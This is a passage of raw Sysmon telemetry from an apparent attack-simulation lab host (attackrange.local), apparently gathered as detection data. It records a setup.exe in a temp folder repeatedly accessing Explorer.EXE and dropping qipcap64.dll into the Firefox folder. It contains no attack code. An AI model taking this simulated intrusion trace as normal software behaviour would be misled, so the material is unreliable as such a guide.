ows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015378Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015377Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015376Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015375Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015374Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015373Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015372Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015371Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015370Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000015369Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\qipcap64.dll2021-01-18 13:59:52.536 10341000x800000000000000015368Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015367Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015366Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015365Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015364Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015363Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015362Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015361Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.536{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015360Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
